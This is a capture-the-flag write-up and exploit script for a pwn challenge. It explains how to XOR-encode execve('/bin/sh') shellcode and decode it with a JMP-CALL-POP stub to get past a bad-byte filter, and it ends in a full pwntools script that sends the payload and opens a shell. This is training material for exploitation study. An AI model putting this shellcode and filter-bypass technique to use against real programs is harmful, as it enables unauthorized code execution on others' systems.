Encode/Decode shellcode

Execute is a pwn challenge that requires us to write shellcode that bypasses the filter check.

When we decompile the execute binary, we can see that there is a check function which will compare user input to an array of bad bytes.

bad bytes: ;Tbinsh\xf6\xd2\xc0_\xc9flag\x00

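The bad bytes cover key parts of a typical execve shellcode: the syscall number 59 (0x3b, the character ;), the letters of /bin/sh, the opcodes of push rsp (0x54, T) and pop rdi (0x5f, _), the last byte of xor rax, rax / xor rsi, rsi / xor rdx, rdx (0xc0, 0xf6, 0xd2), and the null byte. Typically, we would write the shellcode like this: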

xor rax, rax ; clear out the rax register
mov rdi, 0x0068732f6e69622f ; hex of /bin/sh str
push rdi ; pushing the /bin/sh value on the stack
push rsp ; pushing the stack pointer value on the stack
pop rdi ; putting the value of the top of the stack in rdi
xor rsi, rsi ; clear out the rsi register
xor rdx, rdx ; clear out the rdx register
mov rax, 59 ; syscall number in rax
syscall ; perform execve("/bin/sh", NULL, NULL) syscall

A good way around the bad bytes filter is to encode our payload. But to do that, we will also need a decoder, otherwise we will execute garbage.
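To see why the plain shellcode cannot be sent as is, here is a minimal sketch of the filter in Python. It assumes check() rejects the input as soon as any single byte appears in the bad bytes array. The shellcode bytes are hand-assembled here for illustration (in the exploit they come from pwntools), and find_bad_bytes is a hypothetical helper name.

```python
# Bad bytes copied from the challenge's filter.
BAD_BYTES = b";Tbinsh\xf6\xd2\xc0_\xc9flag\x00"

# Hand-assembled bytes of the plain execve shellcode (assumption: the usual
# x86-64 encodings; in the exploit these bytes come from pwntools' asm()).
PLAIN = bytes.fromhex(
    "4831c0"                # xor rax, rax
    "48bf2f62696e2f736800"  # mov rdi, 0x0068732f6e69622f
    "57"                    # push rdi
    "54"                    # push rsp
    "5f"                    # pop rdi
    "4831f6"                # xor rsi, rsi
    "4831d2"                # xor rdx, rdx
    "48c7c03b000000"        # mov rax, 59
    "0f05"                  # syscall
)


def find_bad_bytes(payload, bad=BAD_BYTES):
    """Return (offset, byte) pairs for every payload byte found in `bad`."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


hits = find_bad_bytes(PLAIN)
for offset, byte in hits:
    print(f"offset {offset:2d}: {byte:#04x}")
```

Almost every instruction of the plain shellcode trips the filter, which is why patching single instructions is not practical and encoding the whole payload is the easier route.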

What is shellcode

Shellcode is a small piece of machine code that we inject into a vulnerable program and get it to execute, usually to spawn a shell (/bin/sh).

Why are we writing shellcode

In the decompiled main function, notice that the program runs check() on our input and, if the input passes the check, executes our buf array by calling it through a function pointer ((&buf)()).

The stack is executable, so the shellcode we place in buf (which lives on the stack) can actually run.

At main+174 we can see the call instruction that calls rdx, which contains our shellcode.

Encoding & Decoding shellcode

To decode our encoded shellcode, we can use a technique called JMP-CALL-POP. This will allow us to send a big set of instructions that will start with the decoder handling our encoded payload, and decoding it byte by byte.

More information can be found in Ray Doyle’s blog post: https://www.doInyler.net/security-not-included/hello-world-shellcode.

JMP-CALL-POP

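The idea is to start by jumping to our call_decoder label, which then calls the decoder function. We jump forward first so that the call goes backward: a backward call encodes a negative displacement (bytes like 0xff), whereas a short forward call would encode a small positive displacement padded with null bytes. This blog post explains it well: https://marcosvalle.github.io/osce/2018/05/06/JMP-CALL-POP-technique.html.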
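A quick way to convince ourselves of the null byte argument is to build the bytes of a near call by hand. The sketch below assumes the standard encoding of call rel32 (opcode 0xe8 followed by a signed 32-bit little-endian displacement). The helper call_rel32 and the two displacements are made up for illustration.

```python
import struct


def call_rel32(displacement):
    """Encode `call rel32`: 0xE8 + signed 32-bit little-endian displacement."""
    return b"\xe8" + struct.pack("<i", displacement)


forward = call_rel32(0x20)    # target 0x20 bytes after the call
backward = call_rel32(-0x19)  # target 0x19 bytes before the end of the call

print("forward :", forward.hex(), "-> has nulls:", b"\x00" in forward)
print("backward:", backward.hex(), "-> has nulls:", b"\x00" in backward)
```

The forward call carries three null bytes in its displacement, while the backward call is padded with 0xff instead, which the filter does not reject.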

In assembly, the call instruction pushes the return address (i.e. the address of the next instruction) on the stack, then sets RIP (the instruction pointer) to the called target.

RSP is the stack pointer, so it will always point to the top of the stack. What we have at the top of the stack now is the address of our actual shellcode (because in our exploit code, it will come right after the call instruction).

When we POP RSI, we pop the value at the top of the stack into the RSI register. So it copies the value that RSP points to (the address of our shellcode), not RSP itself, into RSI, and then moves RSP up by 8 bytes.

Our call pushes the return address (the address of the next instruction bab99) on the stack.

The value at the top of the stack (where RSP points) is bab99, and we POP that address into the RSI register.

Then, we can save a copy of that address into RDI. The reason why we do that is because when we decode our shellcode, we will be incrementing the RSI pointer (since we decode byte by byte). Saving the start address allows us to easily jump back to that address to execute our decoded shellcode.

The decoding is done directly in memory, that’s why we can jump back to the start of the actual shellcode to execute it.
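The decode loop can be mimicked in plain Python to check the logic before touching assembly. This is only a simulation under assumptions: memory is a bytearray standing in for the stack buffer, the variables rsi, rdi and rcx mirror the registers, and decode_in_place, the 4-byte stand-in stub and the sample payload are hypothetical.

```python
KEY = 0x0d  # same XOR key as the one used in this write-up


def decode_in_place(memory, start, length, key=KEY):
    """Mimic the decoder: XOR `length` bytes of `memory` in place from `start`."""
    rsi = start    # pop rsi: pointer to the first encoded byte
    rdi = rsi      # mov rdi, rsi: remember where the payload starts
    rcx = length   # mov cl, length: loop counter
    while True:
        memory[rsi] ^= key  # xor byte ptr [rsi], al
        rsi += 1            # add rsi, 1
        rcx -= 1            # loop: decrement rcx ...
        if rcx == 0:        # ... and fall through once it reaches 0
            break
    return rdi              # jmp rdi: where execution would continue


stub = b"STUB"                       # stand-in for the decoder bytes
plain = bytes.fromhex("4831c00f05")  # sample payload: xor rax, rax; syscall
memory = bytearray(stub + bytes(b ^ KEY for b in plain))

entry = decode_in_place(memory, len(stub), len(plain))
print(memory[entry:].hex())
```

Only the bytes after the stub change, and the saved start address points at the first decoded byte, which is exactly what jmp rdi relies on.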

The decoder shellcode

deobfs_shellcode = asm(f"""
/* GNU as (used by pwntools) treats ';' as a statement separator, so comments are C-style */
jmp call_decoder

decoder:
pop rsi /* pop the return address, i.e. the address of our encoded shellcode, into rsi */
mov rdi, rsi /* keep a copy to jmp back to later */
/* use the 8-bit registers cl and al so the immediates contain no null bytes */
mov cl, {payload_len} /* loop counter: number of bytes to decode */
mov al, 0x0d /* XOR key, 13 in decimal */

decode_loop:
xor byte ptr [rsi], al /* xor one byte at a time */
add rsi, 0x1 /* advance the pointer */
loop decode_loop /* decrement rcx and repeat until it is 0 (assumes the upper bytes of rcx are already 0) */
jmp rdi /* jmp to the saved start of the decoded shellcode */

call_decoder:
call decoder
""")

The encoded shellcode

I XORed my shellcode with the value 13 (nothing crazy: I picked it more or less at random, then checked that the encoded shellcode didn’t contain any bad bytes). So now we have an encoded shellcode which, until it is decoded, is really just garbage.

actual_shellcode = asm("""
xor rax, rax /* null the rax register */
mov rdi, 0x0068732f6e69622f /* rdi = "/bin/sh" with a trailing null byte */
push rdi /* push the string on the stack */
push rsp /* then push the stack pointer on the stack */
pop rdi /* pop it into rdi, so rdi now points to the /bin/sh string */
xor rsi, rsi /* null the rsi register (argv) */
xor rdx, rdx /* null the rdx register (envp) */
mov rax, 59 /* syscall number for execve */
syscall /* perform the syscall with the registers set up above */
""")

safe = []
for num in range(0, len(actual_shellcode)):
    safe.append(actual_shellcode[num] ^ 13)  # XOR each byte with the key
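Instead of picking the key by trial and error, we could also list every single-byte key that gives a clean encoding. The sketch below is one way to do it, not what the original exploit does: xor_encode and usable_keys are hypothetical helpers, the shellcode bytes are hand-assembled (assumed to match what asm() produces), and the filter is assumed to reject any byte from the bad bytes array.

```python
BAD_BYTES = b";Tbinsh\xf6\xd2\xc0_\xc9flag\x00"

# Hand-assembled plain shellcode (assumption: same bytes as pwntools' output).
PLAIN = bytes.fromhex(
    "4831c048bf2f62696e2f736800"  # xor rax, rax; mov rdi, "/bin/sh\0"
    "57545f4831f64831d2"          # push rdi; push rsp; pop rdi; xor rsi/rdx
    "48c7c03b0000000f05"          # mov rax, 59; syscall
)


def xor_encode(data, key):
    """XOR every byte of `data` with the single-byte `key`."""
    return bytes(b ^ key for b in data)


def usable_keys(data, bad=BAD_BYTES):
    """Keys whose encoding of `data` avoids `bad`.

    The key itself must also be clean, because it ends up in the decoder
    as the immediate of `mov al, key`. Key 0 is skipped (it encodes nothing).
    """
    return [
        key for key in range(1, 256)
        if key not in bad and not any(b in bad for b in xor_encode(data, key))
    ]


keys = usable_keys(PLAIN)
print("13 is usable:", 13 in keys)
print("number of usable keys:", len(keys))
```

XOR is its own inverse, so applying the same key a second time gives back the original bytes. That is all the decoder has to do.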

With pwntools you can assemble the code using asm("""[your ASM code]""").

Ok so now we have our decoder that will decode our encoded payload. This way, we bypass the bad bytes filter and we can still execute a syscall with execve, and get a shell !! Success
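One thing worth double-checking is that the decoder itself is clean too, since the filter sees the whole input and not just the encoded part. The sketch below runs the bad bytes check over stub + encoded payload. The stub bytes are hand-assembled under the assumption that the assembler picks the short jmp and the usual encodings, so real asm() output may differ. In the exploit, it would be safer to run the same check on deobfs_shellcode directly.

```python
BAD_BYTES = b";Tbinsh\xf6\xd2\xc0_\xc9flag\x00"
KEY = 0x0d

# Hand-assembled plain shellcode (assumption: same bytes as pwntools' output).
PLAIN = bytes.fromhex(
    "4831c048bf2f62696e2f736800"  # xor rax, rax; mov rdi, "/bin/sh\0"
    "57545f4831f64831d2"          # push rdi; push rsp; pop rdi; xor rsi/rdx
    "48c7c03b0000000f05"          # mov rax, 59; syscall
)

# Hand-assembled decoder stub for a 31-byte payload (assumed encodings).
STUB = bytes.fromhex(
    "eb12"        # jmp call_decoder
    "5e"          # decoder: pop rsi
    "4889f7"      # mov rdi, rsi
    "b11f"        # mov cl, 31
    "b00d"        # mov al, 0x0d
    "3006"        # decode_loop: xor byte ptr [rsi], al
    "4883c601"    # add rsi, 1
    "e2f8"        # loop decode_loop
    "ffe7"        # jmp rdi
    "e8e9ffffff"  # call_decoder: call decoder
)

payload = STUB + bytes(b ^ KEY for b in PLAIN)
leftovers = [hex(b) for b in payload if b in BAD_BYTES]
print(leftovers or "payload is clean")
```

This also shows why the decoder sets cl with mov rather than clearing rcx with xor rcx, rcx: that instruction ends in 0xc9, which is on the bad bytes list.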

Together, it will look like this in the Python script:

shellcode = deobfs_shellcode + bytes(safe)
p.sendline(shellcode)
p.interactive()

The full exploit script:

from pwn import *

IP, PORT = "IP", 0  # placeholders: replace with the challenge host and port
elf = ELF("./execute", checksec=False)
#libc = ELF("./libc.so.6", checksec=False)
context.binary = elf
# context.log_level = "debug"
context.terminal = ["kitty", "-e"]

gs = """
"""

def conn():
    if args.REMOTE:
        r = remote(IP, PORT)
    elif args.LOCAL:
        r = process([elf.path])
    elif args.GDB:
        r = gdb.debug([elf.path], gdbscript=gs)
    else:
        r = process([elf.path], level="WARNING")
    return r

with conn() as p:
    
    black_list = b";Tbinsh\xf6\xd2\xc0_\xc9flag\x00"

    actual_shellcode = asm("""
    xor rax, rax 
    mov rdi, 0x0068732f6e69622f
    push rdi
    push rsp
    pop rdi
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 59
    syscall
    """)
    
    safe = []
   
    # XOR-encode the shellcode with the key 13
    for num in range(0, len(actual_shellcode)):
        safe.append(actual_shellcode[num] ^ 13)
    # Check the encoded shellcode for bad bytes
    for i in range(0, len(black_list)):
        for j in range(0, len(safe)):
            if black_list[i] == safe[j]:
                print("Bad byte in encoded shellcode: " + hex(safe[j]))
                print(chr(safe[j]))
 
    payload_len = len(safe)
  
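    # In x86-64, loop uses the RCX register as its counter. CL is the lowest 8 bits of RCX,
    # and setting only CL works here because the payload is shorter than 256 bytes
    # (this assumes the upper bytes of RCX are already zero when the shellcode starts).
    # AL is the lowest 8 bits of the RAX register and holds the XOR key.
    # Using the 8-bit registers keeps null bytes out of the decoder.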

    deobfs_shellcode = asm(f"""
jmp  call_decoder

decoder:
pop rsi
mov rdi, rsi
mov cl, {payload_len}
mov al, 0x0d

decode_loop:
xor byte ptr [rsi], al
add rsi, 0x1
loop decode_loop
jmp rdi

call_decoder:
call decoder
""")    
    
    shellcode = deobfs_shellcode + bytes(safe)
    p.sendline(shellcode)

    p.interactive()